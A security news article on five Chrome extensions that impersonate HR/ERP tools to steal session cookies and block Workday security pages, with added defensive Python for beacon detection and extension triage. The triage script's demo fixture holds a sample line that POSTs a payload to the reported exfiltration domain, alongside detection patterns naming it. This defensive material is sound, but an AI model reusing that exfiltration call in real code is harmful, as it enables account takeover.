Security researchers at McAfee have identified five malicious Google Chrome extensions that pose as legitimate human resources (HR) and enterprise resource planning (ERP) tools. The extensions attempt to hijack user accounts, exposing the organizations that depend on these systems to risks they did not sign up for. The campaign has drawn wide attention in the security community as an example of how far browser-based attacks have advanced.
The five extensions, built to imitate these trusted applications, do more than steal authentication cookies: they also contain functionality for monitoring what users do. Each one carries the same hard-coded list of 23 security-related Chrome extensions, and these are by no means obscure tools; they include widely used extensions such as EditThisCookie, Cookie-Editor, ModHeader, Redux DevTools and SessionBox.
Coordinated Attack Campaign
Security analysts assess that the campaign is a coordinated operation, given the identical functionality and infrastructure patterns observed across the extensions, which points to a single threat actor or a shared toolkit. Two of the extensions, DataByCloud 1 and DataByCloud 2, first appeared on Aug 18, 2021, underscoring how long the threat has persisted.
DataByCloud 2 expands significantly on its predecessor, including the ability to block access to 56 individual pages, among them the pages used to update passwords, manage two-factor authentication (2FA) devices and view security audit logs. The extensions exfiltrate the gathered cookies to a remote server under the api.databycloud[.]com domain every minute, a cadence that lets an attacker hijack an account almost as soon as the session exists.
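The once-a-minute upload is itself a detection opportunity. The following is an added example, not McAfee's or Socket's tooling: it runs over a constructed, simplified proxy log (format `<ISO-8601 timestamp> <client IP> <HTTP method> <host> <bytes sent>`; the sample lines are invented) and flags clients that contact the reported exfiltration domain on a fixed cadence. The 60-second period comes from the article; the tolerance and minimum-hit thresholds are assumptions you would tune to your own traffic.

```python
"""Beacon detection for the cookie-exfiltration traffic described above.

Added example (not McAfee's or Socket's tooling). It scans a constructed,
simplified proxy log with the shape
    <ISO-8601 timestamp> <client IP> <HTTP method> <host> <bytes sent>
and flags clients that contact the reported exfiltration domain on a
roughly fixed cadence (the article reports once per minute).
"""
from collections import defaultdict
from datetime import datetime

# Domain named in the report (written api.databycloud[.]com in the article).
EXFIL_DOMAINS = {"api.databycloud.com"}

# Constructed sample traffic, not real logs: 10.0.0.12 uploads roughly every
# 60 s; 10.0.0.33 touches the domain once, which on its own is not a beacon.
SAMPLE_LOG = """\
2025-09-01T09:00:00Z 10.0.0.12 POST api.databycloud.com 4821
2025-09-01T09:00:07Z 10.0.0.33 GET  www.example.com 310
2025-09-01T09:01:00Z 10.0.0.12 POST api.databycloud.com 4790
2025-09-01T09:01:31Z 10.0.0.33 GET  api.databycloud.com 120
2025-09-01T09:02:01Z 10.0.0.12 POST api.databycloud.com 4833
2025-09-01T09:02:59Z 10.0.0.12 POST api.databycloud.com 4812
"""


def parse_line(line):
    """Split one log line into (timestamp, client_ip, method, host, bytes_out)."""
    ts, ip, method, host, nbytes = line.split()
    return (datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, method,
            host.lower(), int(nbytes))


def find_beacons(log_text, period_s=60, tolerance_s=5, min_hits=3):
    """Return {client_ip: [timestamps]} for clients whose requests to an
    exfiltration domain recur every period_s +/- tolerance_s seconds,
    at least min_hits times."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, _method, host, _bytes = parse_line(line)
        if host in EXFIL_DOMAINS:
            by_client[ip].append(ts)

    beacons = {}
    for ip, stamps in by_client.items():
        stamps.sort()
        if len(stamps) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # A true beacon keeps its cadence; ad-hoc browsing does not.
        if all(abs(gap - period_s) <= tolerance_s for gap in gaps):
            beacons[ip] = stamps
    return beacons


if __name__ == "__main__":
    for ip, stamps in find_beacons(SAMPLE_LOG).items():
        print(f"{ip}: {len(stamps)} uploads, first {stamps[0].isoformat()}")
```

Because the extensions encrypt their C2 traffic, payload inspection is unreliable; the destination host (DNS query, TLS SNI, or proxy CONNECT) and the timing are what remain visible, and they are what this check keys on. Run the same logic against your own proxy or DNS export by replacing `SAMPLE_LOG` with the file contents and adapting `parse_line` to the field order.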
“The extensions work in concert to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking.” – Kush Pandya
The identical extension ID whitelist found in all five malicious extensions further points to a common source. That is troubling in itself, because a single toolkit of this kind can be turned profitably against millions of unsuspecting users.
Evasion Techniques and Impacts
The malicious extensions use several techniques to avoid detection, including encrypting their command-and-control (C2) traffic. Google has since removed all but one of them, Software Access, from the Chrome Web Store. Even so, the removed extensions continue to circulate on third-party download sites such as Softonic, which illustrates the uphill battle security teams fight every day against this kind of duplicitous software.
The intrusive functionality of these extensions goes beyond cookie theft: they also block victims from reaching specific administrative pages in systems such as Workday.
“Tool Access 11 (v1.4) prevents access to 44 administrative pages within Workday by erasing page content and redirecting to malformed URLs.” – Kush Pandya
These capabilities complicate incident response and leave affected organizations more exposed.
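Since the removed extensions still circulate outside the Chrome Web Store, it is worth checking what is actually installed on endpoints rather than relying on store takedowns. The following is an added example, not a McAfee or Socket tool: it walks a Chrome profile's `Extensions` directory and flags any extension that carries one of the names reported in the article, that requests the `cookies` permission together with broad host access, or whose JavaScript references the reported exfiltration domain. The demo profile, its 32-character extension IDs and its manifests are constructed for the example; the real extensions' IDs are not given in the article and are not assumed here.

```python
"""Triage a Chrome profile's installed extensions for the traits reported here.

Added example, not a McAfee or Socket tool. It walks Chrome's on-disk layout
    <profile>/Extensions/<32-char extension id>/<version>/manifest.json
and flags an extension when (a) its name matches one reported in the article,
(b) it requests the cookies permission together with broad host access, or
(c) any of its JavaScript references the reported exfiltration domain.
The demo profile, its extension IDs and its manifests are constructed.
"""
import json
import os
import tempfile

# Names from the article; the fifth extension is not named in the text.
REPORTED_NAMES = {"databycloud 1", "databycloud 2", "tool access 11", "software access"}
EXFIL_DOMAIN = "databycloud.com"          # api.databycloud[.]com in the report
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def host_patterns(manifest):
    """Host access lives in host_permissions (MV3) or mixed into permissions (MV2)."""
    pats = set(manifest.get("host_permissions", []))
    pats |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    return pats


def scan_extension(ext_dir):
    """Return a list of human-readable findings for one unpacked extension."""
    findings = []
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)

    name = str(manifest.get("name", "")).strip().lower()
    if name in REPORTED_NAMES:
        findings.append(f"name matches reported extension: {manifest.get('name')}")

    if "cookies" in manifest.get("permissions", []) and host_patterns(manifest) & BROAD_HOSTS:
        findings.append("cookies permission combined with broad host access")

    for root, _dirs, files in os.walk(ext_dir):
        for fn in sorted(files):
            if fn.endswith(".js"):
                with open(os.path.join(root, fn), encoding="utf-8", errors="ignore") as fh:
                    if EXFIL_DOMAIN in fh.read():
                        findings.append(f"references {EXFIL_DOMAIN} in {fn}")
    return findings


def scan_profile(extensions_root):
    """Map '<id>/<version>' to findings for every extension that has any."""
    report = {}
    for ext_id in sorted(os.listdir(extensions_root)):
        id_dir = os.path.join(extensions_root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            ext_dir = os.path.join(id_dir, version)
            if os.path.isfile(os.path.join(ext_dir, "manifest.json")):
                findings = scan_extension(ext_dir)
                if findings:
                    report[f"{ext_id}/{version}"] = findings
    return report


def build_demo_profile():
    """Constructed fixture: one benign extension and one shaped like the campaign."""
    root = tempfile.mkdtemp(prefix="chrome-ext-demo-")

    def write(ext_id, version, manifest, js):
        d = os.path.join(root, ext_id, version)
        os.makedirs(d)
        with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
        with open(os.path.join(d, "background.js"), "w", encoding="utf-8") as fh:
            fh.write(js)

    # Hypothetical IDs: Chrome IDs are 32 letters a-p, so these are shape-valid only.
    write("a" * 32, "1.0.0",
          {"manifest_version": 3, "name": "Benign Notes", "permissions": ["storage"]},
          "console.log('hello');")
    write("b" * 32, "1.4.0",
          {"manifest_version": 3, "name": "Tool Access 11",
           "permissions": ["cookies", "webNavigation"], "host_permissions": ["<all_urls>"]},
          "fetch('https://api.databycloud.com/upload', {method: 'POST', body: payload});")
    return root


def demo_report():
    """Build the demo profile, scan it and return the report."""
    return scan_profile(build_demo_profile())


if __name__ == "__main__":
    for key, findings in demo_report().items():
        print(key)
        for f in findings:
            print("  -", f)
```

To run it against a real machine, point `scan_profile` at the profile's extension directory: `~/.config/google-chrome/Default/Extensions` on Linux, `~/Library/Application Support/Google/Chrome/Default/Extensions` on macOS, or `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on Windows. Name matching catches only what has already been reported; the permission check (cookies plus broad host access) is the durable signal, and any hit there deserves a manual look even when the name is unfamiliar.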
Implications for Security Teams
As organizations increasingly rely on digital platforms for HR and ERP functions, the implications of these malicious extensions are profound. The combination of continuous credential theft, administrative interface blocking, and session hijacking creates a scenario where security teams can detect unauthorized access but cannot remediate through normal channels.
“This installs the victim’s authentication state directly into the threat actor’s browser session.” – Socket
Together, these findings highlight the need for continued vigilance and a proactive approach to security. Organizations should make strong security practices a priority, including regular system audits, user training, and strict policies on third-party software installations.

